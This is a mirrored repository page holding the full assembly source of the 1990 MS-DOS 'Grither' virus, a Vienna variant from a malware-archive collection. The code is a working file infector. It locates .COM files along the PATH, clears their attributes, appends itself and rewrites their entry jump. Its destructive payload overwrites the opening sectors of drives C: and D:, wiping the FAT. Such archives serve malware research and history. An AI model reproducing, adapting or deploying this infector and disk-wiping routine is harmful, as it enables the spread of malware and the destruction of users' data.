Mirrors/vxug-MalwareSourceCode
13
1
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-06-28 09:52:32 +00:00
Code Releases Activity
71c7752aaa
vxug-MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.grither.asm
vxunderground dda6c7045d
Add files via upload
2021-01-12 17:44:11 -06:00

330 lines
7.8 KiB
NASM
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

;**************************************************************************
;** GRITHER VIRUS **
;** Created: 27 Oct 1990 **
;** [NukE] Notes: Does come from the Vienna Virus! And copies itself on **
;** *.COMs and will re-write the begining sectors of drive **
;** C: & D:! Erasing the FATs area... **
;** **
;** Sources Brought to you by -> Rock Steady [NukE]s Head Programmer! **
;** **
;**************************************************************************
data_1e equ 2Ch ; (65AC:002C=0)
data_2e equ 75h ; (65AC:0075=0)
data_3e equ 79h ; (65AC:0079=0)
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
grither proc far
start:
;* jmp short loc_1 ;*(0112)
db 0EBh, 10h
db 90h
data_5 db '<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Qº', 9, 3, ò<E280B9>Æ' ; Data table (indexed access)
db 0Ah, 0
db 0BFh, 0, 1, 0B9h, 3, 0
db 0F3h, 0A4h, 8Bh, 0F2h, 0B4h, 30h
db 0CDh, 21h, 3Ch, 0, 75h, 3
db 0E9h, 0C5h, 1
loc_2:
push es
mov ah,2Fh ; '/'
int 21h ; DOS Services ah=function 2Fh
; get DTA ptr into es:bx
mov [si+0],bx
nop ;*Fixup for MASM (M)
mov [si+2],es
nop ;*Fixup for MASM (M)
pop es
mov dx,5Fh
nop
add dx,si
mov ah,1Ah
int 21h ; DOS Services ah=function 1Ah
; set DTA to ds:dx
push es
push si
mov es,ds:data_1e ; (65AC:002C=0)
mov di,0
loc_3:
pop si
push si
add si,1Ah
nop ;*Fixup for MASM (M)
lodsb ; String [si] to al
mov cx,8000h
repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al
mov cx,4
locloop_4:
lodsb ; String [si] to al
scasb ; Scan es:[di] for al
jnz loc_3 ; Jump if not zero
loop locloop_4 ; Loop if cx > 0
pop si
pop es
mov [si+16h],di
nop ;*Fixup for MASM (M)
mov di,si
nop
add di,1Fh
nop ;*Fixup for MASM (M)
mov bx,si
add si,1Fh
nop ;*Fixup for MASM (M)
mov di,si
jmp short loc_10 ; (01B9)
loc_5:
cmp word ptr [si+16h],0
nop ;*Fixup for MASM (M)
jne loc_6 ; Jump if not equal
jmp loc_19 ; (02E9)
loc_6:
push ds
push si
mov ds,es:data_1e ; (65AC:002C=0)
mov di,si
mov si,es:[di+16h]
nop ;*Fixup for MASM (M)
add di,1Fh
nop ;*Fixup for MASM (M)
loc_7:
lodsb ; String [si] to al
cmp al,3Bh ; ';'
je loc_9 ; Jump if equal
cmp al,0
je loc_8 ; Jump if equal
stosb ; Store al to es:[di]
jmp short loc_7 ; (019B)
loc_8:
mov si,0
loc_9:
pop bx
pop ds
mov [bx+16h],si
nop ;*Fixup for MASM (M)
nop
cmp ch,5Ch ; '\'
je loc_10 ; Jump if equal
mov al,5Ch ; '\'
stosb ; Store al to es:[di]
loc_10:
mov [bx+18h],di
nop ;*Fixup for MASM (M)
mov si,bx
add si,10h
nop ;*Fixup for MASM (M)
mov cx,6
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
mov si,bx
mov ah,4Eh ; 'N'
mov dx,1Fh
nop
add dx,si
mov cx,3
int 21h ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
jmp short loc_12 ; (01DD)
loc_11:
mov ah,4Fh ; 'O'
int 21h ; DOS Services ah=function 4Fh
; find next filename match
loc_12:
jnc loc_13 ; Jump if carry=0
jmp short loc_5 ; (017F)
loc_13:
mov ax,ds:data_2e[si] ; (65AC:0075=0)
and al,1Fh
cmp al,1Fh
je loc_11 ; Jump if equal
cmp word ptr ds:data_3e[si],0FA00h ; (65AC:0079=0)
ja loc_11 ; Jump if above
cmp word ptr ds:data_3e[si],0Ah ; (65AC:0079=0)
jb loc_11 ; Jump if below
mov di,[si+18h]
nop ;*Fixup for MASM (M)
push si
add si,7Dh
nop ;*Fixup for MASM (M)
loc_14:
lodsb ; String [si] to al
stosb ; Store al to es:[di]
cmp al,0
jne loc_14 ; Jump if not equal
pop si
mov ax,4300h
mov dx,1Fh
nop
add dx,si
int 21h ; DOS Services ah=function 43h
; get/set file attrb, nam@ds:dx
mov [si+8],cx
nop ;*Fixup for MASM (M)
mov ax,4301h
and cx,0FFFEh
mov dx,1Fh
nop
add dx,si
int 21h ; DOS Services ah=function 43h
; get/set file attrb, nam@ds:dx
mov ax,3D02h
mov dx,1Fh
nop
add dx,si
int 21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
jnc loc_15 ; Jump if carry=0
jmp loc_18 ; (02DA)
loc_15:
mov bx,ax
mov ax,5700h
int 21h ; DOS Services ah=function 57h
; get/set file date & time
mov [si+4],cx
nop ;*Fixup for MASM (M)
mov [si+6],dx
nop ;*Fixup for MASM (M)
mov ah,2Ch ; ','
int 21h ; DOS Services ah=function 2Ch
; get time, cx=hrs/min, dh=sec
and dh,7
jnz loc_16 ; Jump if not zero
mov ah,40h ; '@'
mov cx,85h
mov dx,si
add dx,8Ah
int 21h ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
jmp short loc_17 ; (02C3)
db 90h
loc_16:
mov ah,3Fh ; '?'
mov cx,3
mov dx,0Ah
nop
add dx,si
int 21h ; DOS Services ah=function 3Fh
; read file, cx=bytes, to ds:dx
jc loc_17 ; Jump if carry Set
cmp ax,3
jne loc_17 ; Jump if not equal
mov ax,4202h
mov cx,0
mov dx,0
int 21h ; DOS Services ah=function 42h
; move file ptr, cx,dx=offset
jc loc_17 ; Jump if carry Set
mov cx,ax
sub ax,3
mov [si+0Eh],ax
nop ;*Fixup for MASM (M)
add cx,2F7h
mov di,si
sub di,1F5h
mov [di],cx
mov ah,40h ; '@'
mov cx,306h
mov dx,si
sub dx,1F7h
int 21h ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
jc loc_17 ; Jump if carry Set
cmp ax,306h
jne loc_17 ; Jump if not equal
mov ax,4200h
mov cx,0
mov dx,0
int 21h ; DOS Services ah=function 42h
; move file ptr, cx,dx=offset
jc loc_17 ; Jump if carry Set
mov ah,40h ; '@'
mov cx,3
mov dx,si
add dx,0Dh
nop ;*Fixup for MASM (M)
int 21h ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
loc_17:
mov dx,[si+6]
nop ;*Fixup for MASM (M)
mov cx,[si+4]
nop ;*Fixup for MASM (M)
and cx,0FFE0h
or cx,1Fh
mov ax,5701h
int 21h ; DOS Services ah=function 57h
; get/set file date & time
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
loc_18:
mov ax,4301h
mov cx,[si+8]
nop ;*Fixup for MASM (M)
mov dx,1Fh
nop
add dx,si
int 21h ; DOS Services ah=function 43h
; get/set file attrb, nam@ds:dx
loc_19:
push ds
mov ah,1Ah
mov dx,[si+0]
nop ;*Fixup for MASM (M)
mov ds,[si+2]
nop ;*Fixup for MASM (M)
int 21h ; DOS Services ah=function 1Ah
; set DTA to ds:dx
pop ds
loc_20:
pop cx
xor ax,ax ; Zero register
xor bx,bx ; Zero register
xor dx,dx ; Zero register
xor si,si ; Zero register
mov di,100h
push di
xor di,di ; Zero register
retn 0FFFFh
db 10 dup (0)
db 0CDh, 20h, 90h, 0E9h, 0, 0
db 2Ah, 2Eh, 43h, 4Fh, 4Dh, 0
db 0, 0, 0, 0, 50h, 41h
db 54h, 48h, 3Dh, 0, 0
db 105 dup (0)
db 0EBh, 58h, 90h
db ' `7O `88@99@6r `65@85M%AACC%YMJ%'
db 'LWNYMJW%AACC% `:@86@95r `68@87MH'
db 'tzwyjx~%tk%Jqj}nts `5r$'
db '3'
db 0C0h, 8Eh, 0D8h, 0B0h, 2, 0B9h
db 0A0h, 0, 33h, 0D2h, 0BBh, 0
db 0, 0CDh, 26h, 0BBh, 0, 0
loc_21:
cmp byte ptr data_5[bx],24h ; (65AC:0103=90h) '$'
je loc_22 ; Jump if equal
sub byte ptr data_5[bx],5 ; (65AC:0103=90h)
inc bx
jmp short loc_21 ; (0400)
loc_22:
mov dx,offset data_5 ; (65AC:0103=90h)
mov ah,9
int 21h ; DOS Services ah=function 09h
; display char string at ds:dx
int 20h ; Program Terminate
grither endp
seg_a ends
end start

View Git Blame Copy Permalink